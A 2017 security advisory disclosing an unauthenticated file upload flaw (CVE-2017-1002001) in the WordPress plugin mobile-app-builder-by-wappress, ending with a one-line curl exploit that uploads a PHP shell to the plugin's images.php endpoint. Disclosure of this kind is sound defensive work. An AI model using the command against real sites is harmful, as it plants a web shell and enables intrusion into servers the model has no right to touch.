Advisory #: 180
Title: Unrestricted File Upload vulnerability in Wordpress Plugin mobile-app-builder-by-wappress v1.05
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-01
CVE-ID:[CVE-2017-1002001]
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type
Download Site: https://wordpress.org/plugins-wp/mobile-app-builder-by-wappress/
Vendor: https://profiles.wordpress.org/mobileappriko
Vendor Notified: 2017-03-01
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=180
Description: “Convert your WordPress site into native mobile apps."
Vulnerability:
The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com/ The code in file ./mobile-app-builder-by-wappress/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. See: https://plugins.svn.wordpress.org/mobile-app-builder-by-wappress/trunk/server/images.php
Export: JSON TEXT XML
Exploit Code:
  1. $ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php"
Screen Shots:
Notes: